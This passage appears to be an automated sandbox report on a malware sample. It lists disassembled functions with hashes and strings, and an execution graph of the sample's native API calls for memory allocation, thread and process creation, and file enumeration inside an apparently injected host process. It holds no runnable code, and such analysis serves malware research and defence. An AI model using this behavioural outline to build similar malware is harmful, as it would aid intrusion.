                                                              Function 0139B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 02f15e79515ceb51fdbb22f5ed44dd524b90f8e55534d37adf7c6024477003f6
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 3381D470E052499EEF25CE6CE891FFEFFB1AF45368F184219D851A7299C7349840CB91
                                                              Function 014020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                                                              • Instruction ID: 14311912f038fb75c5304432ac486590644f37c703222b08ef7f3a314f9ce6ea
                                                              • Opcode Fuzzy Hash: 370fb44b8e579ceb677c9250087ed5ca1d6644324ebaab4a67716a18cf8f906b
                                                              • Instruction Fuzzy Hash: B521517AA00119ABDB11DF7EC844EEFBBF8EF54644F440126E945E7284E770E9018BA1
                                                              Function 0137F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013C02BD
                                                              • RTL: Re-Waiting, xrefs: 013C031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013C02E7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                                                              • Instruction ID: b2b41c9d531f0598e04ccfd4606c7f78b98952e9665d232f78eaaec3cbd697b1
                                                              • Opcode Fuzzy Hash: 8e701be2e5952bef4c32a3215871c5848667e0fc01f0b3dda4527840f62e7814
                                                              • Instruction Fuzzy Hash: B5E1CE34604781DFE725CF2CC884B2ABBE9BB84728F140A1DF5A58B6E1D778D845CB42
                                                              Function 0138BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 013C7B8E
                                                              • RTL: Re-Waiting, xrefs: 013C7BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013C7B7F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                                                              • Instruction ID: e0ecd2604163cb0332a78b723ae71ed810b5c15bae7f25abebc27a9366e7efd8
                                                              • Opcode Fuzzy Hash: abdbe22b9c065aef29638ac6744bc6bed9125c1afc3d0d51e67bb6bcc605dccc
                                                              • Instruction Fuzzy Hash: 0141E1353007039FDB21EF29D840B6AB7E5EF98718F000A1DF95ADB680DB71E8098B91
                                                              Function 0138B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 013C72A3
                                                              • RTL: Re-Waiting, xrefs: 013C72C1
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013C7294
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                                                              • Instruction ID: d89f21c7ea50b30e9d3d88a68035c4559798781ffb03bc75266e8edac327d93a
                                                              • Opcode Fuzzy Hash: deb77a2354578e3d5fc303242b3e2d8ad56ad1f563280d06c834e0ccce881144
                                                              • Instruction Fuzzy Hash: 8941F235700707ABDB20DF29CC41B66B7A6FB94B18F14061DFD55AB640DB31E8028BD1
                                                              Function 01402300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                                                              • Instruction ID: 15c6f4a5f14cf09192b6a6d7bffb2ab9881f0b7e8d2b2b402fb6bf50e41c0503
                                                              • Opcode Fuzzy Hash: 8bb1db3b8de74a6a604878c0a4cb241c354451397928c3e7c1d7ea9d66e8cdb1
                                                              • Instruction Fuzzy Hash: C731A7726001299FDB61DF3DCC44FEFB7F8EB44614F444466E949E3280EB70AA448B60
                                                              Function 01397D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 0e55a7290639afee77711aa383ce3d25e5106acc39c4f820bc8f162f84f5aa2e
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 1191B471E2020A9BEF24DF6DC8816BEBBA5FF84728F14451AE956E72C0E73089458F11
                                                              Function 01359126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                                                              • Instruction ID: 7f0e4cd687eeac809c9956c413070de4c856c6c8b2b4a2a387200c390fea2c65
                                                              • Opcode Fuzzy Hash: cef30475f265ff242d76c68c05629e62894d89aa9ace95b26aba0f9d523beae0
                                                              • Instruction Fuzzy Hash: 44812C71D00269DBDB35CB58CC44BEEB7B8AB48758F0141DAEA19B7640E7705E84CFA0

                                                              Execution Graph

                                                              Execution Coverage:2.4%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:439
                                                              Total number of Limit Nodes:71
                                                              execution_graph 101337 269b960 101340 26bb760 101337->101340 101339 269cfd1 101343 26b98e0 101340->101343 101342 26bb791 101342->101339 101344 26b9978 101343->101344 101346 26b990e 101343->101346 101345 26b998b NtAllocateVirtualMemory 101344->101345 101345->101342 101346->101342 101347 2699f20 101348 2699f2f 101347->101348 101349 2699f6d 101348->101349 101350 2699f5a CreateThread 101348->101350 101351 26a7720 101352 26a7738 101351->101352 101354 26a778f 101351->101354 101352->101354 101355 26ab660 101352->101355 101356 26ab686 101355->101356 101357 26ab8b3 101356->101357 101382 26b9b50 101356->101382 101357->101354 101359 26ab6f9 101359->101357 101385 26bc9c0 101359->101385 101361 26ab718 101361->101357 101362 26ab7ec 101361->101362 101391 26b8e30 101361->101391 101364 26a5f50 LdrInitializeThunk 101362->101364 101366 26ab80b 101362->101366 101364->101366 101381 26ab89b 101366->101381 101402 26b89a0 101366->101402 101367 26ab783 101367->101357 101375 26ab7b2 101367->101375 101377 26ab7d4 101367->101377 101395 26a5f50 101367->101395 101373 26a8500 LdrInitializeThunk 101374 26ab8a9 101373->101374 101374->101354 101417 26b4ae0 LdrInitializeThunk 101375->101417 101376 26ab872 101407 26b8a50 101376->101407 101398 26a8500 101377->101398 101379 26ab88c 101412 26b8bb0 101379->101412 101381->101373 101383 26b9b6d 101382->101383 101384 26b9b7e CreateProcessInternalW 101383->101384 101384->101359 101386 26bc930 101385->101386 101387 26bc98d 101386->101387 101418 26bb8d0 101386->101418 101387->101361 101389 26bc96a 101421 26bb7f0 101389->101421 101392 26b8e4a 101391->101392 101430 2e82c0a 101392->101430 101393 26ab77a 101393->101362 101393->101367 101397 26a5f8b 101395->101397 101433 26b8ff0 101395->101433 101397->101375 101399 26a8513 101398->101399 101439 26b8d30 101399->101439 101401 26a853e 101401->101354 101403 26b8a1d 101402->101403 101405 26b89cb 101402->101405 101445 2e839b0 LdrInitializeThunk 101403->101445 101404 26b8a3f 101404->101376 101405->101376 101408 26b8a7e 101407->101408 101409 26b8ad0 101407->101409 101408->101379 101446 2e84340 LdrInitializeThunk 101409->101446 101410 26b8af2 101410->101379 101413 26b8c30 101412->101413 101415 26b8bde 101412->101415 101447 2e82fb0 LdrInitializeThunk 101413->101447 101414 26b8c52 101414->101381 101415->101381 101417->101377 101424 26b9a90 101418->101424 101420 26bb8e8 101420->101389 101427 26b9ad0 101421->101427 101423 26bb806 101423->101387 101425 26b9aaa 101424->101425 101426 26b9ab8 RtlAllocateHeap 101425->101426 101426->101420 101428 26b9aea 101427->101428 101429 26b9af8 RtlFreeHeap 101428->101429 101429->101423 101431 2e82c1f LdrInitializeThunk 101430->101431 101432 2e82c11 101430->101432 101431->101393 101432->101393 101434 26b90a1 101433->101434 101436 26b901f 101433->101436 101438 2e82d10 LdrInitializeThunk 101434->101438 101435 26b90e3 101435->101397 101436->101397 101438->101435 101440 26b8d5b 101439->101440 101441 26b8dae 101439->101441 101440->101401 101444 2e82dd0 LdrInitializeThunk 101441->101444 101442 26b8dd0 101442->101401 101444->101442 101445->101404 101446->101410 101447->101414 101448 26a11e0 101449 26a11fa 101448->101449 101454 26a4990 101449->101454 101451 26a1215 101452 26a1249 PostThreadMessageW 101451->101452 101453 26a125a 101451->101453 101452->101453 101455 26a49b4 101454->101455 101456 26a49bb 101455->101456 101457 26a49fb LdrLoadDll 101455->101457 101456->101451 101457->101456 101458 26a71a0 101459 26a71ca 101458->101459 101462 26a8330 101459->101462 101461 26a71f1 101463 26a834d 101462->101463 101469 26b8f10 101463->101469 101465 26a839d 101466 26a83a4 101465->101466 101467 26b8ff0 LdrInitializeThunk 101465->101467 101466->101461 101468 26a83cd 101467->101468 101468->101461 101470 26b8fab 101469->101470 101472 26b8f3b 101469->101472 101474 2e82f30 LdrInitializeThunk 101470->101474 101471 26b8fe1 101471->101465 101472->101465 101474->101471 101475 26b8c60 101476 26b8cf2 101475->101476 101478 26b8c8e 101475->101478 101480 2e82ee0 LdrInitializeThunk 101476->101480 101477 26b8d20 101480->101477 101481 26b96e0 101482 26b9757 101481->101482 101484 26b970b 101481->101484 101483 26b976a NtDeleteFile 101482->101483 101485 26b8de0 101486 26b8dfa 101485->101486 101489 2e82df0 LdrInitializeThunk 101486->101489 101487 26b8e1f 101489->101487 101490 26a2ba5 101493 26a66d0 101490->101493 101492 26a2bd0 101494 26a6703 101493->101494 101495 26a6727 101494->101495 101500 26b9300 101494->101500 101495->101492 101497 26a674a 101497->101495 101504 26b9780 101497->101504 101499 26a67ca 101499->101492 101501 26b931a 101500->101501 101507 2e82ca0 LdrInitializeThunk 101501->101507 101502 26b9343 101502->101497 101505 26b979a 101504->101505 101506 26b97a8 NtClose 101505->101506 101506->101499 101507->101502 101514 26bc8f0 101515 26bb7f0 RtlFreeHeap 101514->101515 101516 26bc905 101515->101516 101517 2699f80 101518 269a2cb 101517->101518 101520 269a659 101518->101520 101521 26bb450 101518->101521 101522 26bb476 101521->101522 101527 2694230 101522->101527 101524 26bb482 101525 26bb4bb 101524->101525 101530 26b5950 101524->101530 101525->101520 101534 26a3650 101527->101534 101529 269423d 101529->101524 101531 26b59b2 101530->101531 101533 26b59bf 101531->101533 101545 26a1e00 101531->101545 101533->101525 101535 26a366d 101534->101535 101537 26a3680 101535->101537 101538 26ba1c0 101535->101538 101537->101529 101540 26ba1da 101538->101540 101539 26ba209 101539->101537 101540->101539 101541 26b8e30 LdrInitializeThunk 101540->101541 101542 26ba266 101541->101542 101543 26bb7f0 RtlFreeHeap 101542->101543 101544 26ba27f 101543->101544 101544->101537 101546 26a1e3b 101545->101546 101561 26a8290 101546->101561 101548 26a1e43 101549 26bb8d0 RtlAllocateHeap 101548->101549 101560 26a211b 101548->101560 101550 26a1e59 101549->101550 101551 26bb8d0 RtlAllocateHeap 101550->101551 101552 26a1e6a 101551->101552 101553 26bb8d0 RtlAllocateHeap 101552->101553 101556 26a1e7b 101553->101556 101554 26a1f15 101557 26a4990 LdrLoadDll 101554->101557 101556->101554 101576 26a6e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101556->101576 101558 26a20cd 101557->101558 101572 26b8290 101558->101572 101560->101533 101562 26a82bc 101561->101562 101577 26a8180 101562->101577 101565 26a82e9 101567 26a82f4 101565->101567 101569 26b9780 NtClose 101565->101569 101566 26a8301 101568 26a831d 101566->101568 101570 26b9780 NtClose 101566->101570 101567->101548 101568->101548 101569->101567 101571 26a8313 101570->101571 101571->101548 101573 26b82f2 101572->101573 101575 26b82ff 101573->101575 101588 26a2130 101573->101588 101575->101560 101576->101554 101578 26a819a 101577->101578 101582 26a8276 101577->101582 101583 26b8ec0 101578->101583 101581 26b9780 NtClose 101581->101582 101582->101565 101582->101566 101584 26b8edd 101583->101584 101587 2e835c0 LdrInitializeThunk 101584->101587 101585 26a826a 101585->101581 101587->101585 101590 26a2150 101588->101590 101604 26a8560 101588->101604 101599 26a26b3 101590->101599 101608 26b1510 101590->101608 101593 26a2372 101594 26bc9c0 2 API calls 101593->101594 101598 26a2387 101594->101598 101595 26a21ae 101595->101599 101611 26bc890 101595->101611 101596 26a23cb 101597 26a8500 LdrInitializeThunk 101596->101597 101596->101599 101601 26a0c80 LdrInitializeThunk 101596->101601 101597->101596 101598->101596 101616 26a0c80 101598->101616 101599->101575 101601->101596 101602 26a8500 LdrInitializeThunk 101603 26a2520 101602->101603 101603->101596 101603->101602 101605 26a856d 101604->101605 101606 26a858c SetErrorMode 101605->101606 101607 26a8593 101605->101607 101606->101607 101607->101590 101609 26bb760 NtAllocateVirtualMemory 101608->101609 101610 26b1531 101608->101610 101609->101610 101610->101595 101612 26bc8a0 101611->101612 101613 26bc8a6 101611->101613 101612->101593 101614 26bb8d0 RtlAllocateHeap 101613->101614 101615 26bc8cc 101614->101615 101615->101593 101617 26a0c91 101616->101617 101620 26b9a00 101617->101620 101621 26b9a1a 101620->101621 101624 2e82c70 LdrInitializeThunk 101621->101624 101622 26a0ca2 101622->101603 101624->101622 101625 26afc00 101626 26afc64 101625->101626 101627 26a66d0 2 API calls 101626->101627 101629 26afd97 101627->101629 101628 26afd9e 101629->101628 101654 26a67e0 101629->101654 101631 26afe1a 101632 26aff52 101631->101632 101651 26aff43 101631->101651 101658 26af9f0 101631->101658 101633 26b9780 NtClose 101632->101633 101635 26aff5c 101633->101635 101636 26afe56 101636->101632 101637 26afe61 101636->101637 101638 26bb8d0 RtlAllocateHeap 101637->101638 101639 26afe8a 101638->101639 101640 26afea9 101639->101640 101641 26afe93 101639->101641 101667 26af8e0 CoInitialize 101640->101667 101642 26b9780 NtClose 101641->101642 101644 26afe9d 101642->101644 101645 26afeb7 101670 26b9270 101645->101670 101647 26aff32 101648 26b9780 NtClose 101647->101648 101649 26aff3c 101648->101649 101650 26bb7f0 RtlFreeHeap 101649->101650 101650->101651 101652 26afed5 101652->101647 101653 26b9270 LdrInitializeThunk 101652->101653 101653->101652 101655 26a6805 101654->101655 101674 26b9130 101655->101674 101659 26afa0c 101658->101659 101660 26a4990 LdrLoadDll 101659->101660 101662 26afa27 101660->101662 101661 26afa30 101661->101636 101662->101661 101663 26a4990 LdrLoadDll 101662->101663 101664 26afafb 101663->101664 101665 26a4990 LdrLoadDll 101664->101665 101666 26afb55 101664->101666 101665->101666 101666->101636 101669 26af945 101667->101669 101668 26af9db CoUninitialize 101668->101645 101669->101668 101671 26b928d 101670->101671 101679 2e82ba0 LdrInitializeThunk 101671->101679 101672 26b92ba 101672->101652 101675 26b914a 101674->101675 101678 2e82c60 LdrInitializeThunk 101675->101678 101676 26a6879 101676->101631 101678->101676 101679->101672 101680 26a7540 101681 26a755c 101680->101681 101689 26a75af 101680->101689 101683 26b9780 NtClose 101681->101683 101681->101689 101682 26a76e7 101684 26a7577 101683->101684 101690 26a6960 NtClose LdrInitializeThunk LdrInitializeThunk 101684->101690 101686 26a76c1 101686->101682 101692 26a6b30 NtClose LdrInitializeThunk LdrInitializeThunk 101686->101692 101689->101682 101691 26a6960 NtClose LdrInitializeThunk LdrInitializeThunk 101689->101691 101690->101689 101691->101686 101692->101682 101693 26ab140 101698 26aae50 101693->101698 101695 26ab14d 101712 26aaac0 101695->101712 101697 26ab163 101699 26aae75 101698->101699 101723 26a8760 101699->101723 101702 26aafc3 101702->101695 101704 26aafda 101704->101695 101705 26aafd1 101705->101704 101707 26ab0c7 101705->101707 101742 26aa510 101705->101742 101709 26ab12a 101707->101709 101751 26aa880 101707->101751 101710 26bb7f0 RtlFreeHeap 101709->101710 101711 26ab131 101710->101711 101711->101695 101713 26aaad6 101712->101713 101720 26aaae1 101712->101720 101714 26bb8d0 RtlAllocateHeap 101713->101714 101714->101720 101715 26aab08 101715->101697 101716 26a8760 GetFileAttributesW 101716->101720 101717 26aae22 101718 26aae3b 101717->101718 101719 26bb7f0 RtlFreeHeap 101717->101719 101718->101697 101719->101718 101720->101715 101720->101716 101720->101717 101721 26aa510 RtlFreeHeap 101720->101721 101722 26aa880 RtlFreeHeap 101720->101722 101721->101720 101722->101720 101724 26a877f 101723->101724 101725 26a8786 GetFileAttributesW 101724->101725 101726 26a8791 101724->101726 101725->101726 101726->101702 101727 26b36f0 101726->101727 101728 26b36fe 101727->101728 101729 26b3705 101727->101729 101728->101705 101730 26a4990 LdrLoadDll 101729->101730 101731 26b3737 101730->101731 101732 26b3746 101731->101732 101755 26b31b0 LdrLoadDll 101731->101755 101734 26bb8d0 RtlAllocateHeap 101732->101734 101738 26b38f1 101732->101738 101735 26b375f 101734->101735 101736 26b38e7 101735->101736 101735->101738 101739 26b377b 101735->101739 101737 26bb7f0 RtlFreeHeap 101736->101737 101736->101738 101737->101738 101738->101705 101739->101738 101740 26bb7f0 RtlFreeHeap 101739->101740 101741 26b38db 101740->101741 101741->101705 101743 26aa536 101742->101743 101756 26adf40 101743->101756 101745 26aa5a8 101747 26aa730 101745->101747 101748 26aa5c6 101745->101748 101746 26aa715 101746->101705 101747->101746 101749 26aa3d0 RtlFreeHeap 101747->101749 101748->101746 101761 26aa3d0 101748->101761 101749->101747 101752 26aa8a6 101751->101752 101753 26adf40 RtlFreeHeap 101752->101753 101754 26aa92d 101753->101754 101754->101707 101755->101732 101758 26adf64 101756->101758 101757 26adf6d 101757->101745 101758->101757 101759 26bb7f0 RtlFreeHeap 101758->101759 101760 26adfb0 101759->101760 101760->101745 101762 26aa3ed 101761->101762 101765 26adfc0 101762->101765 101764 26aa4f3 101764->101748 101766 26adfe4 101765->101766 101767 26ae08e 101766->101767 101768 26bb7f0 RtlFreeHeap 101766->101768 101767->101764 101768->101767 101769 26aa001 101770 26aa016 101769->101770 101771 26aa01b 101769->101771 101772 26aa04d 101771->101772 101773 26bb7f0 RtlFreeHeap 101771->101773 101773->101772 101774 26b9480 101775 26b9537 101774->101775 101777 26b94af 101774->101777 101776 26b954a NtCreateFile 101775->101776 101778 26b1b40 101779 26b1b5c 101778->101779 101780 26b1b98 101779->101780 101781 26b1b84 101779->101781 101783 26b9780 NtClose 101780->101783 101782 26b9780 NtClose 101781->101782 101784 26b1b8d 101782->101784 101785 26b1ba1 101783->101785 101788 26bb910 RtlAllocateHeap 101785->101788 101787 26b1bac 101788->101787 101789 26b0500 101790 26b051d 101789->101790 101791 26a4990 LdrLoadDll 101790->101791 101792 26b0538 101791->101792 101793 26b63c0 101794 26b641a 101793->101794 101796 26b6427 101794->101796 101797 26b3e10 101794->101797 101798 26bb760 NtAllocateVirtualMemory 101797->101798 101799 26b3e51 101798->101799 101800 26a4990 LdrLoadDll 101799->101800 101803 26b3f50 101799->101803 101801 26b3e91 101800->101801 101802 26b3ed2 Sleep 101801->101802 101801->101803 101802->101801 101803->101796 101804 26a8c04 101805 26a8c14 101804->101805 101807 26a8adf 101805->101807 101808 26a74c0 101805->101808 101809 26a74d6 101808->101809 101811 26a750c 101808->101811 101809->101811 101812 26a7330 LdrLoadDll 101809->101812 101811->101807 101812->101811 101813 2e82ad0 LdrInitializeThunk 101814 26a3553 101815 26a8180 2 API calls 101814->101815 101816 26a3563 101815->101816 101817 26b9780 NtClose 101816->101817 101818 26a357f 101816->101818 101817->101818 101819 26b16d1 101824 26b95f0 101819->101824 101821 26b16f2 101822 26b9780 NtClose 101821->101822 101823 26b1719 101822->101823 101825 26b969a 101824->101825 101827 26b961e 101824->101827 101826 26b96ad NtReadFile 101825->101826 101826->101821 101827->101821 101828 26a26d0 101829 26a2706 101828->101829 101830 26b8e30 LdrInitializeThunk 101828->101830 101833 26b9810 101829->101833 101830->101829 101832 26a271b 101834 26b989f 101833->101834 101835 26b983b 101833->101835 101838 2e82e80 LdrInitializeThunk 101834->101838 101835->101832 101836 26b98cd 101836->101832 101838->101836 101839 26ac9d0 101841 26ac9f9 101839->101841 101840 26acafc 101841->101840 101842 26acaa0 FindFirstFileW 101841->101842 101842->101840 101845 26acabb 101842->101845 101843 26acae3 FindNextFileW 101844 26acaf5 FindClose 101843->101844 101843->101845 101844->101840 101845->101843 101846 26a5fd0 101847 26a8500 LdrInitializeThunk 101846->101847 101848 26a6000 101846->101848 101847->101848 101850 26a602c 101848->101850 101851 26a8480 101848->101851 101852 26a84c4 101851->101852 101857 26a84e5 101852->101857 101858 26b8b00 101852->101858 101854 26a84d5 101855 26a84f1 101854->101855 101856 26b9780 NtClose 101854->101856 101855->101848 101856->101857 101857->101848 101859 26b8b7d 101858->101859 101861 26b8b2b 101858->101861 101863 2e84650 LdrInitializeThunk 101859->101863 101860 26b8b9f 101860->101854 101861->101854 101863->101860 101864 26b1ed0 101865 26b1ee9 101864->101865 101866 26b1f31 101865->101866 101869 26b1f71 101865->101869 101871 26b1f76 101865->101871 101867 26bb7f0 RtlFreeHeap 101866->101867 101868 26b1f41 101867->101868 101870 26bb7f0 RtlFreeHeap 101869->101870 101870->101871

                                                              Executed Functions

                                                              Function 02699F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 26 2699f80-269a2c1 27 269a2cb-269a2d5 26->27 28 269a321-269a32b 27->28 29 269a2d7-269a2f6 27->29 32 269a33c-269a348 28->32 30 269a308-269a319 29->30 31 269a2f8-269a306 29->31 33 269a31f 30->33 31->33 34 269a34a-269a354 32->34 35 269a356 32->35 33->27 34->32 37 269a35d-269a364 35->37 38 269a396-269a3a0 37->38 39 269a366-269a394 37->39 40 269a3b1-269a3bd 38->40 39->37 41 269a3cd-269a3d7 40->41 42 269a3bf-269a3cb 40->42 43 269a3e8-269a3f4 41->43 42->40 45 269a40b-269a41c 43->45 46 269a3f6-269a409 43->46 47 269a42d-269a436 45->47 46->43 49 269a438-269a44a 47->49 50 269a44c-269a456 47->50 49->47 51 269a467-269a473 50->51 53 269a48a-269a48e 51->53 54 269a475-269a488 51->54 55 269a490-269a4b5 53->55 56 269a4b7 53->56 54->51 55->53 58 269a4be-269a4c7 56->58 59 269a4cd-269a4d4 58->59 60 269a5d0-269a5da 58->60 61 269a506-269a509 59->61 62 269a4d6-269a504 59->62 63 269a5eb-269a5f7 60->63 64 269a50f-269a518 61->64 62->59 65 269a5f9-269a60c 63->65 66 269a60e-269a618 63->66 68 269a51a-269a532 64->68 69 269a534-269a543 64->69 65->63 67 269a629-269a635 66->67 71 269a647-269a64e 67->71 72 269a637-269a63d 67->72 68->64 73 269a54a-269a554 69->73 74 269a545 69->74 78 269a654 call 26bb450 71->78 79 269a6f7-269a6fb 71->79 75 269a63f-269a642 72->75 76 269a645 72->76 77 269a565-269a571 73->77 74->60 75->76 76->67 81 269a573-269a585 77->81 82 269a587-269a59b 77->82 87 269a659-269a663 78->87 84 269a6fd-269a71e 79->84 85 269a73c-269a746 79->85 81->77 90 269a5ac-269a5b5 82->90 88 269a72c-269a73a 84->88 89 269a720-269a729 84->89 91 269a757-269a760 85->91 92 269a674-269a67d 87->92 88->79 89->88 93 269a5cb 90->93 94 269a5b7-269a5c9 90->94 95 269a762-269a772 91->95 96 269a774-269a77e 91->96 100 269a68d-269a694 92->100 101 269a67f-269a68b 92->101 93->58 94->90 95->91 97 269a780-269a79a 96->97 98 269a7b6-269a7ba 96->98 103 269a79c-269a7a0 97->103 104 269a7a1-269a7a3 97->104 105 269a7bc-269a7d3 98->105 106 269a7d5-269a7df 98->106 108 269a6bd-269a6c7 100->108 109 269a696-269a6a7 100->109 101->92 103->104 110 269a7a5-269a7ae 104->110 111 269a7b4 104->111 105->98 113 269a7f0-269a7fa 106->113 112 269a6d8-269a6e4 108->112 114 269a6a9-269a6ad 109->114 115 269a6ae-269a6b0 109->115 110->111 111->96 112->79 118 269a6e6-269a6f5 112->118 119 269a7fc-269a80f 113->119 120 269a811-269a81a 113->120 114->115 116 269a6bb 115->116 117 269a6b2-269a6b8 115->117 116->100 117->116 118->112 119->113
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: e861d43d7e2fadebd1466bae3480e385565388d4a08d1792f9688bc5891d48e3
                                                              • Instruction ID: 4d7e44412627040c5d956211ec105fb3659d7b1c0d365ebd8d3a23aadf051cd0
                                                              • Opcode Fuzzy Hash: e861d43d7e2fadebd1466bae3480e385565388d4a08d1792f9688bc5891d48e3
                                                              • Instruction Fuzzy Hash: 73328BB0E05668CFEF28CF84C8947DDBBB6BB45308F5081D9D44A6B280CBB95A85CF55
                                                              Function 026AC9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 026ACAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 026ACAEE
                                                              • FindClose.KERNELBASE(?), ref: 026ACAF9
                                                              Memory Dump Source
